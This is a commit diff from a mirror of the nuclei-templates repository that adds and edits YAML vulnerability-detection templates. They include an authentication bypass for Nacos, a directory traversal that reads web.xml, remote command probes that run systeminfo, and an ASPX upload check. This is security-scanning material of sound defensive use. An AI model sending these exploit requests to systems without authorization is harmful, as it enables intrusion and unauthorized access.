daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-05-05 17:04:59 +03:00
parent a094b38f83 0ea51e5a54
commit 07c2e79fb9
14 changed files with 178 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
| takeovers | 68 | exposures | 91 | technologies | 66 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| cves | 306 | vulnerabilities | 147 | exposed-panels | 124 |
| takeovers | 68 | exposures | 92 | technologies | 66 |
| misconfiguration | 56 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1049 files**.
**103 directories, 1054 files**.
</td>
</tr>

2
cves/2020/CVE-2020-35951.yaml
View File

@ -68,7 +68,7 @@ requests:
- "not found in <b>([/a-z_]+)wp"
req-condition: true
matchers-condition: or
matchers-condition: and
matchers:
- type: word

17
cves/2020/CVE-2020-6287.yaml
View File

@ -12,16 +12,6 @@ info:
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
# Affected Versions: 7.30, 7.31, 7.40, 7.50
# p.s:
# > Don't forget to change the default credentials
# > to create new admin in associated file:
# > `payloads/CVE-2020-6287.xml`
# Ref:
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
requests:
- payloads:
data: helpers/payloads/CVE-2020-6287.xml
@ -41,4 +31,9 @@ requests:
part: body
- type: status
status:
- 200
- 200
- type: word
words:
- "text/xml"
part: header

4
cves/2020/CVE-2020-7961.yaml
View File

@ -15,7 +15,6 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
attack: sniper
raw:
@ -40,16 +39,15 @@ requests:
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
- "kern\\.ostype"
condition: or
part: body
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "Microsoft Windows (.*)"
- "kern\\.ostype: (.*)"
- "Distributor ID: (.*)"

5
cves/2020/CVE-2020-8191.yaml
View File

@ -34,3 +34,8 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header

49
cves/2021/CVE-2021-29441.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-29441
info:
name: Nacos prior to 1.4.1 Authentication Bypass
description: |
This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
enables Nacos servers to bypass this filter and therefore skip authentication checks.
This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
This issue may allow any user to carry out any administrative tasks on the Nacos server.
author: dwisiswant0
severity: high
reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
tags: nacos,auth-bypass,cve,cve2021
requests:
- raw:
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Nacos-Server
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 403"
- "status_code_2 == 200"
condition: and
- type: dsl
dsl:
- "contains(body_1, 'Forbidden')"
- "contains(body_2, 'true')"
condition: and
- type: word
words:
- "application/json"
part: header

25
exposures/files/gogs-install-exposure.yaml Normal file
View File

@ -0,0 +1,25 @@
id: gogs-install-exposure
info:
name: Gogs install exposure
author: dhiyaneshDk
severity: high
tags: gogs,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/install'
matchers-condition: and
matchers:
- type: word
words:
- "General Settings"
- "Database Settings"
part: body
condition: and
- type: status
status:
- 200

3
misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
View File

@ -21,5 +21,6 @@ requests:
- type: word
words:
- '{{randstr}}'
- 'suggestions'
- '"results":'
- '"suggestions":'
condition: and

2
misconfiguration/nginx-status.yaml → misconfiguration/nginx/nginx-status.yaml
View File

@ -4,7 +4,7 @@ info:
name: Nginx Status Page
author: dhiyaneshDK
severity: low
tags: config,nginx
tags: misconfig,nginx
requests:
- method: GET

25
misconfiguration/nginx/nginx-vhost-traffic-status.yaml Normal file
View File

@ -0,0 +1,25 @@
id: nginx-vhost-traffic-status
info:
name: Nginx Vhost Traffic Status
author: geeknik
reference: https://github.com/vozlt/nginx-module-vts
severity: low
tags: status,nginx,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/status"
matchers-condition: and
matchers:
- type: word
words:
- "Nginx Vhost Traffic Status"
- "Host"
- "Zone"
condition: and
- type: status
status:
- 200

8
technologies/kong-detect.yaml
View File

@ -16,10 +16,10 @@ requests:
- type: regex
part: header
regex:
- kong+
- "[Ss]erver: [Kk]ong+"
extractors:
- type: regex
- type: kval
part: header
regex:
- .*kong.*
kval:
- server

20
vulnerabilities/other/ecology-filedownload-directory-traversal.yaml Normal file
View File

@ -0,0 +1,20 @@
id: ecology-filedownload-directory-traversal
info:
name: Ecology Directory Traversal
author: princechaddha
severity: medium
tags: ecology,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body

32
vulnerabilities/other/gloo-unauth.yaml Normal file
View File

@ -0,0 +1,32 @@
id: gloo-unauth
info:
name: Unauthenticated Gloo UI
author: dhiyaneshDk
severity: high
tags: unauth,gloo
requests:
- method: GET
path:
- '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails'
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
Content-type: "application/grpc-web+proto"
Referer: "{{BaseURL}}/admin/"
matchers-condition: and
matchers:
- type: word
words:
- "gke-remote"
part: body
- type: word
words:
- "application/grpc-web+proto"
part: header
- type: status
status:
- 200

5
vulnerabilities/other/powercreator-cms-rce.yaml
View File

@ -21,7 +21,7 @@ requests:
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg
Poc_Test
{{randstr}}
-----------------------------20873900192357278038549710136--
- |
@ -38,7 +38,8 @@ requests:
regex:
- "(.*?.ASPX)"
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body, 'Poc_Test') && status_code == 200"
- "contains(body_2, '{{randstr}}') && status_code_2 == 200"